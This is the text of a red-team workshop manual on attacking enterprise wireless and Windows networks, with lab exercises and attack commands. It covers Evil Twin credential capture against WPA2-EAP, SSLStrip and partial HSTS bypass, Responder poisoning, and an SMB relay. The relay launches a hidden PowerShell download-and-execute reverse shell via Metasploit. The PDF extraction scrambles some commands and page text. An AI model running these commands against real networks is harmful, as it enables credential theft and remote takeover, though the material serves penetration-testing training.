CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID 1C:7E:E5:E2:EF:D9 -66 10 572 283 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D8 -66 11 569 83 1 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D7 -66 12 580 273 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D6 -66 10 566 43 0 1 54 WPA2 CCMP MGT 1C:7E:E5:62:32:21 -68 11 600 24 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A4 -68 0 598 82 2 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A5 -68 9 502 832 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:B1 -64 14 602 23 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A6 -65 12 601 42 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A7 -62 12 632 173 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A8 -62 10 601 21 1 11 54 WPA2 CCMP MGT ECMNV32 00:17:A4:06:E4:C6 -74 10 597 12 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C7 -74 8 578 234 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C8 -74 10 508 11 1 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C9 -72 11 535 12 0 1 54 WPA2 TKIP MGT 00:13:E8:80:F4:04 -74 11 521 132 0 1 54 WPA2 TKIP MGT prN67n Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 8 00:22:18:38:A4:64 -68 12 576 10 0 3 54 WPA2 CCMP MGT ASFWW 00:22:18:38:A4:65 -68 12 577 431 0 3 54 WPA2 CCMP MGT ASFWW We’ve mapped our in-scope attack surface. Our targets will be the following access points: BSSID ESSID 1C:7E:E5:E2:EF:D9 EC7293 1C:7E:E5:E2:EF:D8 EC7293 1C:7E:E5:E2:EF:D7 EC7293 1C:7E:E5:E2:EF:D6 1C:7E:E5:62:32:21 1C:7E:E5:97:79:A4 ECwnet1 1C:7E:E5:97:79:A5 ECwnet1 1C:7E:E5:97:79:B1 ECwnet1 1C:7E:E5:97:79:A6 ECMNV32 1C:7E:E5:97:79:A7 ECMNV32 1C:7E:E5:97:79:A8 ECMNV32 00:13:E8:80:F4:04 prN67n Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 9 Attacking And Gaining Entry To WPA2-EAP Wireless Networks Chapter Overview Rogue access point attacks are the bread and butter of modern wireless penetration tests. They can be used to perform stealthy man-in-the-middle attacks, steal RADIUS credentials, and trick users into interacting with malicious captive portals. Penetration testers can even use them for traditional functions such as deriving WEP keys and capturing WPA handshakes [1]. Best of all, they are often most effective when used out of range of the target network. For this workshop, we will focus primarily on using Evil Twin attacks. Wireless Theory: Evil Twin Attacks An Evil Twin is a wireless attack that works by impersonating a legitimate access point. The 802.11 protocol allows clients to roam freely from access point to access point. Additionally, most wireless implementations do not require mutual authentication between the access point and the wireless client. This means that wireless clients must rely exclusively on the following attributes to identify access points: 1. BSSID – The access point’s Basic Service Set identifier, which refers to the access point and every client that is associated with it. Usually, the access point's MAC address is used to derive the BSSID. 2. ESSID – The access point’s Extended Service Set identifier, known colloquially as the AP’s “network name.” An Extended Service Set (ESS) is a collection of Basic Service Sets connected using a common Distribution System (DS). 3. Channel – The operating channel of the access point. 
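To make these identifiers concrete, the snippet below is a minimal sketch of a hostapd configuration that advertises a chosen ESSID on a chosen channel, mirroring the hostapd usage shown later in the Wireless Man-In-The-Middle Attacks chapter. The file name, interface name, and values are assumptions, and a real WPA2-EAP Evil Twin would use the EAP-aware tooling introduced below rather than this open access point.

# write a throwaway hostapd config that clones the target's ESSID and channel
root@localhost:~# cat > evil-twin.conf <<'EOF'
interface=wlan0
driver=nl80211
ssid=ECwnet1
channel=6
hw_mode=g
EOF
root@localhost:~# hostapd ./evil-twin.conf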
[22] To execute the attack, the attacker creates an access point using the same ESSID and channel as a Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 10 legitimate AP on the target network. So long as the malicious access point has a more powerful signal strength than the legitimate AP, all devices connected to the target AP will drop and connect to the attacker. [22] Wireless Theory: WPA2-EAP Networks Now let’s talk about WPA2-EAP networks. The most commonly used EAP implementations are EAP-PEAP and EAP-TTLS. Since they’re very similar to one another from a technical standpoint, we’ll be focusing primarily on EAP-PEAP. However, the techniques learned in this workshop can be applied to both. The EAP-PEAP authentication process is an exchange that takes place between three parties: the wireless client (specifically, software running on the wireless client), the access point, and the authentication server. We refer to the wireless client as the supplicant and the access point as the authenticator [2]. Logically, authentication takes place between the supplicant and the authentication server. When a client device attempts to connect to the network, the authentication server presents the supplicant with an x.509 certificate. If the client device accepts the certificate, a secure encrypted tunnel is established between the authentication server and the supplicant. The authentication attempt is then performed through the encrypted tunnel. If the authentication attempt succeeds, the client device is permitted to associate with the target network [2][3]. Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 11 Without the use of the secure tunnel to protect the authentication process, an attacker could sniff the challenge and response then derive the password offline. In fact, legacy implementations of EAP, such as EAP-MD5, are susceptible to this kind of attack. However, the use of a secure tunnel prevents us from using passive techniques to steal credentials for the target network [2][3]. Although we can conceptualize the EAP-PEAP authentication process as an exchange between the supplicant and the authentication server, the protocol’s implementation is a bit more complicated. All communication between the supplicant and the authentication server is relayed by the authenticator (the access point). The supplicant and the authenticator communicate using a Layer 2 protocol such as IEEE 802.11X, and the authenticator communicates with the authentication server using RADIUS, which is a Layer 7 protocol. Strictly speaking, the authentication server and supplicant do not actually communicate directly to one another at all [2][3]. Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 12 As you can imagine, this architecture creates numerous opportunities for abuse once an attacker can access the network. However, for now, we’re going to focus on abusing this authentication process to gain access to the network in the first place. Let’s revisit the EAP-PEAP authentication process, but this time in further detail. [18] The diagram above illustrates the EAP-PEAP/EAP-TTLS authentication process in full detail. When the supplicant associates, it sends an EAPOL-Start to the authenticator. 
The authenticator then sends an EAP-Request Identity to the supplicant. The supplicant responds with its identity, which is forwarded to the authentication server. The authentication server and supplicant then Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 13 setup a secure SSL/TLS tunnel through the authenticator, and the authentication process takes place through this tunnel [2]. Until the tunnel is established, the authenticator is essentially acting as an open access point. Even though the authentication process occurs through a secure tunnel, the encrypted packets are still being sent over open wireless. The WPA2 doesn’t kick in until the authentication process is complete. Open wireless networks are vulnerable to Evil Twin attacks because there is no way for the wireless client to verify the identity of the access point to which it is connecting. Similarly, EAP-PEAP and EAP-TTLS networks are vulnerable to Evil Twin attacks because there is no way to verify the identity of the authenticator [4]. In theory, the certificate presented to the supplicant by the authentication server could be used to verify the identity of the authentication server. However, this is only true so long as the supplicant does not accept invalid certificates. Many supplicants do not perform proper certificate validation. Many other are configured by users or administrators to accept untrusted certificates automatically. Even if the supplicant is configured correctly, the onus is still placed on the user to decline the connection when presented with an invalid certificate [5]. To compromise EAP-PEAP, the attacker first performs an Evil Twin attack against the target access point (which is serving as the authenticator). When a client connects to the rogue access point, it begins an EAP exchange with the attacker’s authenticator and authentication server. If the supplicant accepts the attacker’s certificate, a secure tunnel is established between the attacker’s authentication server and the supplicant. The supplicant then completes the authentication process with the attacker, and the attacker uses the supplicant’s challenge and response to derive the victim’s password [4][5]. Evil Twin Attack Using Hostapd-WPE The first phase of this attack will be to create an Evil Twin using eaphammer. Traditionally, this attack is executed using a tool called hostapd-wpe. Although hostapd-wpe is a powerful tool in its own right, it can be quite cumbersome to use and configure. Eaphammer provides an easy to use command line interface to hostapd-wpe and automates its traditionally time-consuming configuration process. We’ll begin by creating a self-signed certificate using eaphammer’s --cert-wizard flag. The Cert Wizard routine will walk you through the creation of a self-signed x.509 certificate automatically. You will be prompted to enter values for a series of attributes that will be used to create your cert. root@localhost:~# ./eaphammer --cert-wizard Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 14 It's best to choose values for your self-signed certificate that are believable within the context of your target organization. Since we’re attacking Evil Corp, the following examples values would be good choices: 1. Country – US 2. State – Nevada 3. Locale – Las Vegas 4. Organization – Evil Corp 5. 
Email – admin@evilcorp.com 6. CN – admin@evilcorp.com When the Cert Wizard routine finishes, you should see output similar to what is shown in the screenshot below. Once we have created a believable certificate, we can proceed to launch an Evil Twin attack against one of the target access points discovered in the last section. Let’s use eaphammer to perform an Evil Twin attack against the access point with BSSID 1c:7e:e5:97:79:b1. root@localhost:~# ./eaphammer.py --bssid 1C:7E:E5:97:79:B1 --essid ECwnet1 --channel 2 --wpa 2 --auth peap --interface wlan0 --creds Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 15 Provided you can overpower the signal strength of the target access point, clients will begin to disconnect from the target network and connect to your access point. Unless the affected client devices are configured to reject invalid certificates, the victims of the attack will be presented with a message similar to the one below. Fortunately, it’s usually possible to find at least one enterprise employee who will blindly accept your certificate. It’s also common to encounter devices that are configured to accept invalid certificates automatically. In either case, you’ll soon see usernames, challenges, and responses shown in your terminal as shown below. This data can be passed to asleap to obtain a valid set of RADIUS credentials. Congrats. You have your first set of RADIUS creds. root@localhost:~# asleap –C <challenge> -R <response> -W <wordlist> Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 16 Lab Exercise: Evil Twin Attack Against WPA2-PEAP For this lab exercise, you will practice stealing RADIUS credentials by performing an Evil Twin attack against a WPA2-EAP network. 1. Using your wireless router: a. Create a WPA2-EAP network with the EAP type set to PEAP or TTLS. Make sure to set the EAP password to “2muchswagg” without the quotes. 2. From your Windows AD Victim VM: a. Connect to the WPA2-EAP network using your secondary external wireless adapter. 3. From your Kali Linux VM: a. Use airodump-ng to identify your newly created WPA2-EAP network b. Use eaphammer to generate a believable self-signed certificate c. Use eaphammer to capture an EAP Challenge and Response by performing an Evil Twin attack against the WPA2-EAP network d. Use asleap to obtain a set of RADIUS credentials from the Challenge and Response captured in step 3b. Make sure to use the rockyou wordlist, which is located at /usr/share/wordlists/rockyou.txt. Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 17 Wireless Man-In-The-Middle Attacks Chapter Overview In Attacking and Gaining Entry to WPA2-EAP Wireless Networks, we used an Evil Twin attack to steal EAP credentials. This was a relatively simple attack that was performed primarily on Layer 2 of the OSI stack, and worked very well for its intended purpose. However, if we want to do more interesting things with our rogue access point attacks, we’re going to have to start working at multiple levels of the OSI stack. Suppose we wanted to use an Evil Twin to perform a man-in-the-middle attack similar to ARP Poisoning. In theory, this should be possible since in an Evil Twin attack the attacker is acting as a functional wireless access point. 
Furthermore, such an attack would not degrade the targeted network in the same way that traditional attacks such as ARP Poisoning do. Best of all, such an attack would be very stealthy, as it would not generate additional traffic on the targeted network. To be able to execute such an attack, we will need to expand the capabilities of our rogue access point to make it behave more like a wireless router. This means running our own DHCP server to provide IP addresses to wireless clients, as well as a DNS server for name resolution. It also means that we’ll need to use an operating system that supports packet forwarding. Finally, we’ll need a simple yet flexible utility that redirects packets from one network interface to another. We'll do this by using dnsmasq as our DHCP server and iptables to route packets. To provide DNS, we can issue a DHCP Option that tells clients to use Google's nameservers. For our operating Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 18 system, we'll continue to use Linux since it provides an easy to use API with which to enable packet forwarding at the kernel level. Configuring Linux As A Router Before we begin, execute the following commands to prevent extraneous processes from interfering with the rogue access point. For our access point, we’ll use hostapd once again. Technically, we don’t have much choice in the matter if we continue to use Linux as an attack platform. This is because hostapd is actually the userspace master mode interface provided by mac80211, which is the wireless stack used by modern Linux kernels. Hostapd is very simple to use and configure. The snippet included above represents a minimal configuration file used by hostapd. You can paste it into a file named hostapd.conf and easily create an access point using the following syntax. After starting our access point, we can give it an IP address and subnet mask using the commands shown below. We’ll also update our routing table to allow our rogue AP to serve as the default gateway of its subnet. root@localhost~# service network-manager stop root@localhost~# rfkill unblock wlan root@localhost~# ifconfig wlan0 up interface=wlan0 driver=nl80211 ssid=FREE_WIFI channel=1 hw_mode=g root@localhost~# hostapd ./hostapd.conf root@localhost~# ifconfig wlan0 10.0.0.1 netmask 255.255.255.0 root@localhost~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 19 For DHCP, we can use either dhcpd or dnsmasq. The second option can often be easier to work with, particularly since it can be used as a DNS server if necessary. A typical dnsmasq.conf file looks like this: The first entry in the snippet shown above defines a DHCP pool of 10.0.0.80 through 10.0.0.254. The second two entries are DHCP Options that are used to tell clients where to find the nameserver and network gateway. The dhcp-authoritative flag specifies that we are the only DHCP server on the network. The log-queries entry is self-explanatory. Copy the config snippet shown above into a file named dnsmasq.conf, and run in a new terminal using the following syntax. By default, dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do this, we keep it from doing so using the -z flag. Additionally, we use the -i flag to force dnsmasq to only listen on our $phy interface. 
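Before moving on, it can be worth confirming that the address and route actually took effect. The following is a quick sketch using the iproute2 equivalents of the commands above, with the same assumed interface name:

# expect 10.0.0.1/24 assigned to the rogue AP interface
root@localhost~# ip addr show wlan0
# expect a 10.0.0.0/24 route via wlan0
root@localhost~# ip route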
We use the -I flag to explicity forbid dnsmasq from running on our local interface. The -p flag is used to indicate the port on which dnsmasq should bind when acting as a DNS server. Setting the -p flag to 0 instructs dnsmasq to not start its DNS server at all. We have an access point, a DNS server, and a DHCP server. To enable packet forwarding in Linux, we use the proc filesystem as shown below. Finally, we configure iptables to allow our access point to act as a NAT. Iptables is a userspace utility that allows administrators to configure the tables of the Linux kernel firewall manually. This is by far the most interesting yet complicated part of this attack. We begin by setting the default policy for the INPUT, OUTPUT, and FORWARD chains in iptables to accept all packets by default. We then flush all tables to give iptables a clean slate. # define DHCP pool dhcp-range=10.0.0.80,10.0.0.254,6h # set Google as nameserver dhcp-option=6,8.8.8.8 # set rogue AP as Gateway dhcp-option=3,10.0.0.1 #Gateway dhcp-authoritative log-queries dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo aroot@localhost~# echo ‘1’ > /proc/sys/net/ipv4/ip_forward root@localhost~# iptables --policy INPUT ACCEPT root@localhost~# iptables --policy FORWARD ACCEPT root@localhost~# iptables --policy OUTPUT ACCEPT root@localhost~# iptables --flush root@localhost~# iptables --table nat --flush Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 20 We then append a new rule to the POSTROUTING chain of the nat table. Any changes made to the packet by the POSTROUTING chain are not visible to the Linux machine itself since the chain is applied to every packet before it leaves the system. The rule chain that we append to POSTROUTING is called MASQUERADE. When applied to a packet, the MASQUERADE rule chain sets the source IP address to the outbound NIC’s external IP address. This effectively creates a NAT. Unlike the SNAT rule chain, which serves a similar function, the MASQUERADE rule chain determines the NIC’s external IP address dynamically. This makes it a great option when working with a dynamically allocated IP address. The rule also says that the packet should be sent to eth0 after the MASQUERADE rule chain is applied. To summarize, the command shown above tells iptables to modify the source address of each packet to eth0’s external IP address and to send each packet to eth0 after this modification occurs. [19] In the diagram shown above, any packets with a destination address that is different from our rogue AP’s local address will be sent to the FORWARD chain after the routing decision is made. We need to add a rule that states that any packets sent to the FORWARD chain from wlan0 should be sent to our upstream interface. The relevant command is shown below. That’s everything we need to use Linux as a functional wireless router. We can combine these commands and configurations into a single script that can be used to start a fully functional wireless root@localhost~# iptables --table nat --append POSTROUTING -o $upstream -- jump MASQUERADE root@localhost~# iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 21 hotspot. 
Such a script can be found in the ~/awae/lab2 directory in your Kali VM, as well as at the following URL: ▪ https://github.com/s0lst1c3/awae/blob/master/lab2/hotspot.sh Lab Exercise: Using Linux As A Router For this exercise, you will practice using your Kali VM as a functional wireless hotspot. 1. Begin by ensuring that your host operating system has a valid internet connection. 2. From your Kali VM, use the bash script in your ~/awae/lab2 directory to create a wireless hotspot. 3. From either your cell phone or your Windows AD Victim VM, connect to your wireless hotspot and browse the Internet. In your Kali VM, observe the hostapd and dnsmasq output that appears in your terminal. Classic HTTPS Downgrade Attack Now that we know how to turn our Linux VM into a wireless router, let’s turn it into a wireless router that can steal creds. We’ll do this by using iptables to redirect all HTTP and HTTPS traffic to a tool called SSLStrip. This tool will perform two essential functions. First, it will create a log of all HTTP traffic sent to or from the victim. We can then search this log for credentials and other sensitive data. Second, it will attempt to break the encryption of any HTTPS traffic it encounters using a technique called SSL Stripping [6]. SSL Stripping was first documented by an excellent hacker known as Moxie Marlinspike. In an SSL Stripping attack, the attacker first sets up a man-in-the-middle between the victim and the HTTP server. The attacker then begins to proxy all HTTP(S) traffic between the victim and the server. When the victim makes a request to access a secure resource, such as a login page, the attacker receives the request and forwards it to the server. From the server’s perspective, the request appears to have been made by the attacker [6]. Consequently, an encrypted tunnel is established between the attacker and the server (instead of between the victim and the server). The attacker then modifies the server’s response, converting it from HTTPS to HTTP, and forwards it to the victim. From the victim’s perspective, the server has just issued it an HTTP response [6]. Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 22 All subsequent requests from the victim and the server will occur over an unencrypted HTTP connection with the attacker. The attacker will forward these requests over an encrypted connection with the HTTP server. Since the victim’s requests are sent to the attacker in plaintext, they can be viewed or modified by the attacker [6]. The server believes that it has established a legitimate SSL connection with the victim, and the victim believes that the attacker is a trusted web server. This means that no certificate errors will occur on the client or the server, rendering both affected parties completely unaware that the attack is taking place [6]. Let’s modify our bash script from Configuring Linux As A Router so that it routes all HTTP(S) traffic to SSLStrip. We’ll do this by appending a new rule to iptables’ PREROUTING chain. Rules appended to the PREROUTING chain are applied to all packets before the kernel touches them. By appending the REDIRECT rule shown below to PREROUTING, we ensure that all HTTP and HTTPS traffic is redirected to a proxy running on port 10000 in userspace [7][8]. We then add the following call to SSLStrip, using the -p flag to log only HTTP POST requests. 
root@localhost~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 10000
root@localhost~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000
root@localhost~# python sslstrip.py -l 10000 -p -w ./sslstrip.log

The updated bash script can be found on your Kali VM in the ~/awae/lab3 directory, as well as at the following URL:
▪ https://github.com/s0lst1c3/awae/blob/master/lab3/http-downgrade.sh

Lab Exercise: Wireless MITM With An HTTP Downgrade
Let's use the script we wrote in the last section to perform a wireless Man-in-the-Middle attack using an Evil Twin and SSLStrip.
1. Begin by ensuring that your host operating system has a valid internet connection.
2. Create an account at https://wechall.net using a throwaway email address.
3. If currently authenticated with https://wechall.net, logout.
4. Create an open network named "FREE_WIFI" using your wireless router.
5. From your Windows AD Victim VM, connect to "FREE_WIFI" and browse the Internet.
6. From your Kali VM:
   a. Use the updated bash script to perform an Evil Twin attack against "FREE_WIFI"
   b. Observe the output that appears in your terminal when the Windows AD Victim VM connects to your rogue access point
7. From your Windows AD Victim VM:
   a. Browse the internet, observing the output that appears in your terminal
   b. Navigate to http://wechall.net
   c. Authenticate with http://wechall.net using the login form to the right of the screen
8. From your Kali VM:
   a. As your authentication attempt occurred over an unencrypted connection, your WeChall credentials should now be in ./sslstrip.log. Find them.
9. From your Windows AD Victim VM:
   a. Logout of http://wechall.net
   b. Navigate to https://wechall.net
   c. Authenticate with https://wechall.net using the login form to the right of the screen
10. Despite the fact that your authentication attempt occurred over HTTPS, your WeChall credentials should have been added to ./sslstrip.log a second time. Find this second set of credentials.

Downgrading Modern HTTPS Implementations Using Partial HSTS Bypasses
Before beginning this section, repeat Lab Exercise: Wireless MITM Using Evil Twin and SSLStrip using your Twitter account. You should notice that the attack fails. This is due to a modern SSL/TLS implementation known as HSTS.
HSTS is an enhancement of the HTTPS protocol that was designed to mitigate the weaknesses exploited by tools such as SSLStrip [9]. When an HTTP client requests a resource from an HSTS enabled web server, the server adds the following header to the response:

Strict-Transport-Security: max-age=31536000

This header tells the browser that it should always request content from the domain over HTTPS. Most modern browsers maintain a list of sites that should always be treated this way [10]. When the web browser receives HSTS headers from a server, it adds the server's domain to this list. If the user attempts to access a site over HTTP, the browser first checks if the domain is in the list. If it is, the browser will automatically perform a 307 Internal Redirect and request the resource over HTTPS instead [9].
The IncludeSubdomains attribute can be added to HSTS headers to tell a web browser that all subdomains of the server's domain should be added to the list as well [9]. For example, suppose a user attempts to access the following URL:

https://evilcorp.com

If the server responds with the following HSTS headers, the user's browser will assume that any request to *.evilcorp.com should be loaded over HTTPS as well.

Strict-Transport-Security: max-age=<expire-time>; includeSubDomains

Additionally, site administrators have the option of adding their domain to an HSTS preload list that ships with every new version of Firefox and Google Chrome. Domains included in the HSTS preload list are treated as HSTS sites regardless of whether the browser has received HSTS headers for that domain.
HSTS is an effective means of protecting against SSL Stripping attacks. However, it is possible to perform a partial HSTS bypass when the following conditions are met:
1. The server's domain has not been added to the HSTS preload list with the IncludeSubdomains attribute set.
2. The server issues HSTS headers without the IncludeSubdomains attribute set.
The following technique was first documented by LeonardoNve during his BlackHat Asia 2014 presentation OFFENSIVE: Exploiting changes on DNS server configuration [11].
To begin, the attacker first establishes a man-in-the-middle as in the original SSL Stripping attack. However, instead of merely proxying HTTP, the attacker also proxies and modifies DNS traffic. When a victim navigates to www.evilcorp.com, for example, the attacker redirects the user to wwww.evilcorp.com over HTTP. Accomplishing this can be as simple as responding with a 302 redirect that includes the following location header:

Location: http://wwww.evilcorp.com

The user's browser then makes a DNS request for wwww.evilcorp.com. Since all DNS traffic is proxied through the attacker, the DNS request is intercepted by the attacker. The attacker then responds using his or her own DNS server, resolving wwww.evilcorp.com to the IP address of www.evilcorp.com. The browser then makes an HTTP request for wwww.evilcorp.com. This request is intercepted by the attacker and modified so that it is an HTTPS request for www.evilcorp.com. As in the original SSL Stripping attack, an encrypted tunnel is established between the attacker and www.evilcorp.com, and the victim makes all requests to wwww.evilcorp.com over plaintext [11].
This technique is effective provided that certificate pinning is not used, and that the user does not notice that they are interacting with a different subdomain than the one originally requested (i.e. wwww.evilcorp.com vs www.evilcorp.com). To deal with the second issue, an attacker should choose a subdomain that is believable within the context in which it is used (i.e. mail.evilcorp.com should be replaced with something like mailbox.evilcorp.com).
Let's update our bash script so that it performs a partial HSTS bypass using LeonardoNve's DNS2Proxy and SSLStrip2. We do this by first adding a line that uses iptables to redirect all DNS traffic to dns2proxy. We then replace our call to SSLStrip with a call to SSLStrip2.
root@localhost~# iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53
root@localhost~# python /opt/sslstrip2/sslstrip2.py -l 10000 -p -w ./sslstrip.log &

Finally, we add a call to dns2proxy as shown below.

root@localhost~# python /opt/dns2proxy/dns2proxy.py -i $phy &

Our completed bash script can be found in your Kali VM within the ~/awae/lab4 directory, as well as at the following URL:
▪ https://github.com/s0lst1c3/awae/blob/master/lab4/partial-hsts-bypass.sh

Lab Exercise: Wireless MITM With Partial HSTS Bypass
1. Populate your browser's HSTS list by attempting to login to Bing.com
2. Repeat Lab Exercise: Wireless MITM Using Evil Twin and SSLStrip using the completed bash script. Instead of capturing your own WeChall credentials, capture your own Bing credentials as you attempt to login to Bing.com. You should notice requests to wwww.bing.com as you do this.
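One way to check the two preconditions above against a target domain is to look at the HSTS header it actually returns. The sketch below uses curl against the fictional Evil Corp domain; the domain is a placeholder, and preload status still has to be confirmed separately against the browsers' preload list (for example via hstspreload.org).

# issue a HEAD request and show only the HSTS header, if any
root@localhost~# curl -sI https://www.evilcorp.com | grep -i strict-transport-security

If the header comes back without the includeSubDomains attribute and the domain is not preloaded, the wwww. subdomain trick described in this section applies.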
If the attack is successful, the victim sends traffic to the attacker. Given that NetBIOS name resolution is used extensively for things such as remote login and accessing SMB shares, the traffic sent to the attacker often contains password hashes [14]. Let’s perform a simple LLMNR/NBT-NS poisoning attack. To do this, we’ll be using a tool called Responder. Start by booting up your Windows AD Victim and Kali virtual machines. From your Kali virtual machine, open a terminal and run the following command: root@localhost~# responder -I eth0 –wf Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 29 This will tell Responder to listen for LLMNR/NBT-NS broadcast queries. Next, use your Windows AD Victim to attempt to access a share from a nonexistent hostname such as the one shown in the screenshot below. Using a nonexistent hostname forces the Windows machine to broadcast an LLMNR/NBT-NS request. Responder will then issue a response, causing the victim to attempt to authenticate with the Kali machine. The results are shown in the screenshot below. Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 30 Lab Exercise: LLMNR/NBT-NS Poisoning Practice using Responder to perform LLMNR/NBT-NS poisoning attacks. Experiment with the Responder’s different command line options. SMB Relay Attacks With impacket NTLM is a relatively simple authentication protocol that relies on a challenge/response mechanism. When a client attempts to authenticate using NTLM, the server issues it a challenge in the form of a string of characters. The client then encrypts challenge using its password hash and sends it back to the server as an NTLM response. The server then attempts to decrypt this response using the user’s password hash. If the decrypted response is identical the plaintext challenge, then the user is authenticated [15]. In an SMB Relay attack, the attacker places him or herself in a position on the network where he or she can view NTLM traffic as it is transmitted across the wire. Man-in-the-middle attacks are often used to facilitate this. The attacker then waits for a client to attempt to authenticate with the target server. When the client begins the authentication process, the attacker relays the authentication attempt to the target. This causes the target server to issue an NTLM challenge back to the attacker, which the attacker relays back to the client. The client receives the NTLM challenge, encrypts it, and sends the NTLM response back to the attacker. The attacker then relays this response back to the target server. The server receives the response, and the attacker becomes authenticated with the target. Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 31 System administrators often use automated scripts to perform maintenance tasks on the network at regularly scheduled intervals. These scripts often use service accounts that have administrative privileges, and use NTLM for remote authentication. This makes them prime candidates for both SMB Relay attacks and the poisoning attacks that we learned about in the last section. Ironically, many types of security related hardware and software authenticate this way as well, including antivirus programs and agentless network access control mechanisms. 
This attack can be mitigated using a technique known as SMB signing, in which packets are digitally signed to confirm their authenticity and point of origin [16]. Most modern Windows operating systems are capable of using SMB signing, although only Domain Controllers have it enabled by default [16]. The impacket toolkit contains an excellent script for performing this type of attack. It’s reliable, flexible, and best of all supports attacks against NTLMv2. Let’s perform a simple SMB Relay attack using impacket’s smbrelayx script. Before we begin, boot up your Kali VM, Windows DC VM, and your Windows AD Victim VM. On your Windows DC VM, type the following command in your PowerShell prompt to obtain its IP address. Do the same on your Windows AD Victim VM to obtain its IP address. Once you have the IP addresses of both the Windows AD Victim and Windows DC VMs, open a terminal on your Kali VM and run ifconfig to obtain your IP address. PS C:\> ipconfig root@localhost~# ifconfig Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 32 On your Kali VM, change directories into /opt/impacket/examples and use the following command to start the smbrelayx script. In the command below, make sure you change the IP address to the right of the -h flag to the IP address of your Windows AD Victim virtual machine. Similarly, change the second IP address to the IP address of your Kali virtual machine. Notice how we pass a Powershell command to run on the targeted machine using the -c flag. The Powershell command bypasses the Windows AD Victim VM’s execution policies and launches a reverse shell downloaded from your Kali virtual machine. Once the payload has been generated, use the following commands within metasploit to launch a server from which to download the reverse shell. As before, change the IP address shown below to the IP address of your Kali virtual machine. The traditional way to perform this attack is to establish a man-in-the-middle with which to intercept an NTLM exchange. However, we can also perform an SMB Relay attack using the LLMNR/NBT-NS poisoning techniques we learned in the last section. To do this, we simply launch responder on our Kali machine as we did before. With responder running, we just need to perform an action on the Windows DC virtual machine that will trigger an NTLM exchange. An easy way to do this is by attempting to access a non- existent SMB share from the Windows DC machine as shown in the screenshot below. root@localhost~# python smbrelayx.py -h 172.16.15.189 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://172.16.15.186:8080')" msf > use exploit/multi/script/web_delivery msf (web_delivery) > set payload windows/meterpreter/reverse_tcp msf (web_delivery) > set TARGET 2 msf (web_delivery) > set LHOST 172.16.15.186 msf (web_delivery) > set URIPATH / msf (web_delivery) > exploit root@localhost~# responder -I eth0 -wrf Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 33 You should now see three things happen on your Kali VM. First, you’ll see Responder send a poisoned answer to your Windows DC virtual machine for the NetBIOS name of the non-existent server. Next, you’ll see impacket successfully execute an SMB Relay attack against the Windows AD Victim machine. 
